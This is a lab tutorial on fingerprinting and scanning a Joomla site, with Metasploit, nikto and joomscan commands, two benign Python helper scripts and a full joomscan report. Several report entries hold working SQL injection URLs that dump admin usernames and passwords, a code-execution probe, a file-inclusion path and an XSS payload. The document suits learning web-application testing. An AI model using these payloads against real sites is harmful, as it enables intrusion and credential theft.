First of all, note that this capsule was carried out on machines internal to our laboratory, purely for the sake of learning and experimentation.

Let's begin!

First, we track down where our target Joomla sits inside our private network; for that we use the netdiscover and nmap commands.

From Metasploit we look for an auxiliary module that tells us the version of the Joomla we are going to analyse. We use the following auxiliary:

use auxiliary/scanner/http/joomla_version

It will also help to know what vulnerabilities may be present in the web server hosting the Joomla. For that we use a tool called nikto; this is the syntax of the command to run (nikto names its HTML report format htm):

nikto -h <ip> -Format htm -output web_server_nikto.html

We confirm that both tools report the same version.

Once we know the server's IP address and that the web application is a Joomla, we go to the browser to confirm it is one. In the address bar we type:

http://midominio/administrator

It is indeed a Joomla!

With these steps done, we use the joomscan tool, which prints to the console the vulnerabilities recorded for the Joomla version we are running, identified by fingerprinting.

joomscan -u http://midominio
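As an added example (not part of the original post, nor code from Metasploit, nikto or joomscan), the following Python script performs the two confirmation steps above by hand: it checks that /administrator/ serves the Joomla back-end login page and reads the <version> element from the XML files a stock Joomla install ships, /language/en-GB/en-GB.xml on Joomla 1.5 and /administrator/manifests/files/joomla.xml on 1.6 and later. The host http://midominio is the lab host assumed throughout this page, and the sample response bodies embedded in the script are constructed so that it also runs offline.

```python
#!/usr/bin/env python3
"""Hand-rolled Joomla fingerprint: confirm the CMS from /administrator/ and read
the version from the XML files Joomla ships. Added example; the target host and
the embedded sample responses are constructed, not captured from a real scan."""
import re
import sys
import urllib.request

BASE = "http://midominio"  # assumed lab host, as on the page

# Files carrying a <version> element in a stock install (1.6+ uses the core
# manifest, 1.5 the en-GB language pack). Checked in order; first hit wins.
VERSION_FILES = (
    "/administrator/manifests/files/joomla.xml",
    "/language/en-GB/en-GB.xml",
)

# Strings the stock Joomla back-end login page contains.
ADMIN_MARKERS = (
    'value="com_login"',
    'content="Joomla!',
    "/administrator/templates/",
)

_VERSION_RE = re.compile(r"<version>\s*([0-9][0-9A-Za-z.\-]*)\s*</version>")

# Constructed sample bodies, shaped like the real files, for offline runs.
SAMPLE_MANIFEST = (
    '<?xml version="1.0" encoding="utf-8"?>\n'
    '<metafile version="1.5" client="site">\n'
    "  <name>English(United Kingdom)</name>\n"
    "  <version>1.5.15</version>\n"
    "</metafile>\n"
)
SAMPLE_ADMIN_HTML = (
    '<meta name="generator" content="Joomla! - Copyright (C) 2005 - 2009 Open Source Matters" />\n'
    '<form action="index.php" method="post" name="login" id="form-login">\n'
    '<input type="hidden" name="option" value="com_login" />\n'
)


def parse_joomla_version(xml_text):
    """Version string from a joomla.xml / en-GB.xml body, or None if absent."""
    m = _VERSION_RE.search(xml_text)
    return m.group(1) if m else None


def looks_like_joomla_admin(html):
    """True if the /administrator/ body carries any stock Joomla login marker."""
    return any(marker in html for marker in ADMIN_MARKERS)


def version_tuple(version):
    """'1.5.15' -> (1, 5, 15); a suffix such as '-RC3' is dropped for comparison."""
    return tuple(int(p) for p in re.findall(r"\d+", version.split("-", 1)[0]))


def fetch(url, timeout=10.0):
    """GET url and return the body as text; '' on any network or HTTP error."""
    req = urllib.request.Request(url, headers={"User-Agent": "joomla-fingerprint/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", errors="replace")
    except (OSError, ValueError):
        return ""


def fingerprint(base_url, get=fetch):
    """Run both checks against base_url. `get` is injectable so the same logic
    can be exercised offline (see run_offline_demo)."""
    base_url = base_url.rstrip("/")
    result = {"is_joomla": looks_like_joomla_admin(get(base_url + "/administrator/")),
              "version": None, "source": None}
    for path in VERSION_FILES:
        version = parse_joomla_version(get(base_url + path))
        if version:
            result["version"], result["source"] = version, path
            break
    return result


def run_offline_demo():
    """Same code path as a live scan, served from the constructed samples:
    the 1.6+ manifest is missing, so the 1.5 language pack supplies the version."""
    canned = {
        "/administrator/": SAMPLE_ADMIN_HTML,
        "/language/en-GB/en-GB.xml": SAMPLE_MANIFEST,
    }
    return fingerprint(BASE, get=lambda url: canned.get(url[len(BASE):], ""))


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(fingerprint(sys.argv[1]))   # e.g. python3 joomla_fingerprint.py http://midominio
    else:
        print(run_offline_demo())
```

Run it with the target URL as the only argument; without arguments it replays the constructed samples. A hit on /administrator/ plus a readable version file is the same evidence the Metasploit auxiliary and the browser check give you, and the version string is what the joomscan listing has to be compared against.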

This is the screen output of the vulnerability analysis:

Vulnerabilities Discovered
==========================

# 1
Info -> Generic: Unprotected Administrator directory
Versions Affected: Any
Check: /administrator/
Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf
Vulnerable? N/A

# 2
Info -> Core: Multiple XSS/CSRF Vulnerability
Versions Affected: 1.5.9 <=
Check: /?1.5.9-x
Exploit: A series of XSS and CSRF faults exist in the administrator application. Affected administrator components include com_admin, com_media, com_search. Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities.
Vulnerable? N/A

# 3
Info -> Core: JSession SSL Session Disclosure Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /?1.5.8-x
Exploit: When running a site under SSL (the entire site is forced to be under ssl), Joomla! does not set the SSL flag on the cookie. This can allow someone monitoring the network to find the cookie related to the session.
Vulnerable? N/A

# 4
Info -> Core: Frontend XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /?1.5.10-x
Exploit: Some values were output from the database without being properly escaped. Most strings in question were sourced from the administrator panel. Malicious normal admin can leverage it to gain access to super admin.
Vulnerable? N/A

# 5
Info -> Core: Frontend XSS – HTTP_REFERER not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-http_ref
Exploit: An attacker can inject JavaScript or DHTML code that will be executed in the context of targeted user browser, allowing the attacker to steal cookies. HTTP_REFERER variable is not properly parsed.
Vulnerable? N/A

# 6
Info -> Core: Frontend XSS – PHP_SELF not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-php-s3lf
Exploit: An attacker can inject JavaScript code in a URL that will be executed in the context of targeted user browser.
Vulnerable? N/A

# 7
Info -> Core: Authentication Bypass Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /administrator/
Exploit: Backend accepts any password for custom Super Administrator when LDAP enabled
Vulnerable? N/A

# 8
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-path-disclose
Exploit: Crafted URL can disclose absolute path
Vulnerable? N/A

# 9
Info -> Core: User redirected Spamming Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-spam
Exploit: User redirect spam
Vulnerable? N/A

# 10
Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability
Versions effected: 1.0.13 <=
Check: /administrator/
Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage.
Vulnerable? N/A

# 11
Info -> CoreLibrary: phpmailer Remote Code Execution Vulnerability
Versions effected: Joomla! 1.5.0 Beta/Stable
Check: /libraries/phpmailer/phpmailer.php
Exploit: N/A
Vulnerable? N/A

# 12
Info -> CoreComponent: com_content SQL Injection Vulnerability
Version Affected: Joomla! 1.0.0 <=
Check: /components/com_content/
Exploit: /index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Vulnerable? No

# 13
Info -> CoreComponent: com_search Remote Code Execution Vulnerability
Version Affected: Joomla! 1.5.0 beta 2 <=
Check: /components/com_search/
Exploit: /index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3B
Vulnerable? No

# 14
Info -> CoreComponent: MailTo SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_mailto/
Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1
Vulnerable? No

# 15
Info -> CoreComponent: com_content Blind SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 RC3
Check: /components/com_content/
Exploit: /index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28
Vulnerable? No

# 16
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_content/
Exploit: The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc). This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration.
Vulnerable? N/A

# 17
Info -> CoreComponent: com_weblinks XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_weblinks/
Exploit: [Requires valid user account] com_weblinks allows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms).
Vulnerable? N/A

# 18
Info -> CoreComponent: com_mailto Email Spam Vulnerability
Version Affected: Joomla! 1.5.6 <=
Check: /components/com_mailto/
Exploit: The mailto component does not verify validity of the URL prior to sending.
Vulnerable? N/A

# 19
Info -> CoreComponent: com_content view=archive SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 Beta1/Beta2/RC1
Check: /components/com_content/
Exploit: Unfiltered POST vars – filter, month, year to /index.php?option=com_content&view=archive
Vulnerable? No

# 20
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.9 <=
Check: /components/com_content/
Exploit: A XSS vulnerability exists in the category view of com_content.
Vulnerable? N/A

# 21
Info -> CoreComponent: com_users XSS Vulnerability
Version Affected: Joomla! 1.5.10 <=
Check: /components/com_users/
Exploit: A XSS vulnerability exists in the user view of com_users in the administrator panel.
Vulnerable? N/A

# 22
Info -> CoreComponent: com_installer CSRF Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /administrator/components/com_installer/
Exploit: N/A
Vulnerable? N/A

# 23
Info -> CoreComponent: com_search Memory Comsumption DoS Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /components/com_search/
Exploit: N/A
Vulnerable? No

# 24
Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_banners/
Exploit: /index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2
Vulnerable? No

# 25
Info -> CoreComponent: com_mailto timeout Vulnerability
Versions effected: 1.5.13 <=
Check: /components/com_mailto/
Exploit: [Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails.
Vulnerable? N/A

# 26
Info -> Component: Dada Mail Manager Component Remote File Inclusion Vulnerability
Version Affected: 2.6 <=
Check: /administrator/components/
Exploit: /administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=
Vulnerable? No

# 27
Info -> Component: cgTestimonial XSS
Versions Affected: 2.2
Check: /components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>
Exploit: /components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>
Vulnerable? N/A

# 28
Info -> Component: Joomla Component com_iproperty SQL Injection Vulnerability
Versions Affected: Any
Check: /index.php?option=com_iproperty&view=agentproperties&id=
Exploit: /index.php?option=com_iproperty&view=agentproperties&id=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users-
Vulnerable? No

# 29
Info -> Component: Joomla Component com_iproperty 1.5.3 (id) SQL Injection Vulnerability
Versions Affected: Any
Check: /index.php?option=com_iproperty&view=agentproperties&id=
Exploit: /index.php?option=com_iproperty&view=agentproperties&id=
Vulnerable? No

# 30
Info -> Component: Component com_newsfeeds SQL injection
Versions Affected: Any <=
Check: /index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
Exploit: /index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
Vulnerable? No

# 31
Info -> Component: Joomla Component com_searchlog SQL Injection
Versions Affected: 3.1.0 <=
Check: /administrator/index.php?option=com_searchlog&act=log
Exploit: /administrator/index.php?option=com_searchlog&act=log
Vulnerable? No

# 32
Info -> Component: Joomla Component com_iproperty 1.5.3 (id) SQL Injection Vulnerability
Versions Affected: Any <=
Check: /index.php?option=com_iproperty&view=agentproperties&id=
Exploit: /index.php?option=com_iproperty&view=agentproperties&id=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--
Vulnerable? No

There is a vulnerable point in 32 found entries!

-----------------------------------------------------------------------

Once they are known, the listing gives us a brief description of how to use each exploit. Read the "Vulnerable?" column with care: "No" means joomscan actually sent the probe and the target did not answer as vulnerable, whereas "N/A" means it only matched the signature against the fingerprinted version and tested nothing. Each "N/A" entry has to be compared against the detected version (and, for third-party components, against the extension's own version) before it is treated as a real finding.
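Added example, not part of the original post or of joomscan: a small triage script that turns the listing above into a yes / no / manual verdict per entry. Entries joomscan actually probed ("Vulnerable? Yes" or "No") keep that answer; "N/A" core entries are decided by comparing the detected version with the "Versions Affected: X <=" bound; third-party "Component:" entries and pre-release lists are left for manual checking because their bound is not a core version. The excerpt embedded in the script is taken from the scan output on this page, and the detected version 1.5.10 is an assumption, since the post does not state what joomla_version reported.

```python
#!/usr/bin/env python3
"""Triage of joomscan output against a known Joomla version. Added example;
the excerpt is taken from the scan listing on this page and the detected
version (1.5.10) is an assumption, since the post does not state it."""
import re

DETECTED_VERSION = "1.5.10"   # assumed; substitute the value joomla_version reported

# Excerpt of the joomscan listing above, reduced to the fields the triage uses.
JOOMSCAN_EXCERPT = """\
# 1
Info -> Generic: Unprotected Administrator directory
Versions Affected: Any
Check: /administrator/
Vulnerable? N/A

# 2
Info -> Core: Multiple XSS/CSRF Vulnerability
Versions Affected: 1.5.9 <=
Check: /?1.5.9-x
Vulnerable? N/A

# 4
Info -> Core: Frontend XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /?1.5.10-x
Vulnerable? N/A

# 15
Info -> CoreComponent: com_content Blind SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 RC3
Check: /components/com_content/
Vulnerable? No

# 25
Info -> CoreComponent: com_mailto timeout Vulnerability
Versions effected: 1.5.13 <=
Check: /components/com_mailto/
Vulnerable? N/A

# 27
Info -> Component: cgTestimonial XSS
Versions Affected: 2.2
Check: /components/com_cgtestimonial/video.php
Vulnerable? N/A

# 28
Info -> Component: Joomla Component com_iproperty SQL Injection Vulnerability
Versions Affected: Any
Check: /index.php?option=com_iproperty&view=agentproperties&id=
Vulnerable? No
"""

_BOUND_RE = re.compile(r"^(\d+(?:\.\d+)*)\s*<=$")


def parse_entries(text):
    """Split the listing into dicts keyed by the lower-cased field name."""
    entries = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = block.splitlines()
        if not lines or not lines[0].startswith("#"):
            continue
        entry = {"num": int(lines[0].lstrip("# ")), "info": ""}
        for line in lines[1:]:
            if line.startswith("Info ->"):            # before the ':' split: 'Core: ...'
                entry["info"] = line[len("Info ->"):].strip()
            elif line.startswith("Vulnerable?"):      # no colon on this line
                entry["vulnerable"] = line[len("Vulnerable?"):].strip()
            elif ":" in line:
                key, _, value = line.partition(":")
                entry[key.strip().lower()] = value.strip()
        entries.append(entry)
    return entries


def affected_field(entry):
    """joomscan spells the field three ways; return whichever is present."""
    for key in ("versions affected", "versions effected", "version affected"):
        if key in entry:
            return entry[key]
    return "N/A"


def version_tuple(version):
    return tuple(int(p) for p in re.findall(r"\d+", version))


def applies(detected, field):
    """'yes' / 'no' / 'manual' for a 'Versions Affected' value and a detected core version."""
    field = field.replace("Joomla!", "").strip()
    if field.startswith("Any"):
        return "yes"
    m = _BOUND_RE.match(field)
    if m:
        return "yes" if version_tuple(detected) <= version_tuple(m.group(1)) else "no"
    return "manual"   # 'N/A', pre-release lists ('1.5.0 RC3', 'Beta/Stable'): check by hand


def triage(detected, text):
    """Return (number, verdict, info) per entry; verdict is yes / no / manual."""
    report = []
    for e in parse_entries(text):
        probe = e.get("vulnerable", "N/A")
        if probe in ("Yes", "No"):
            verdict = probe.lower()          # joomscan sent the probe; keep its answer
        elif e["info"].startswith("Component:"):
            verdict = "manual"               # bound is the extension's version, not core's
        else:
            verdict = applies(detected, affected_field(e))
        report.append((e["num"], verdict, e["info"]))
    return report


def still_applicable(detected, text):
    """Entry numbers that apply to the detected version without further testing."""
    return [num for num, verdict, _ in triage(detected, text) if verdict == "yes"]


if __name__ == "__main__":
    for num, verdict, info in triage(DETECTED_VERSION, JOOMSCAN_EXCERPT):
        print(f"#{num:<3} {verdict:<7} {info}")
```

With the assumed 1.5.10 only entries 1, 4 and 25 survive; bump the version to 1.5.15 and only the generic unprotected /administrator/ entry remains, which is the point: the "vulnerable point in 32 found entries" headline says nothing until the version comparison has been done.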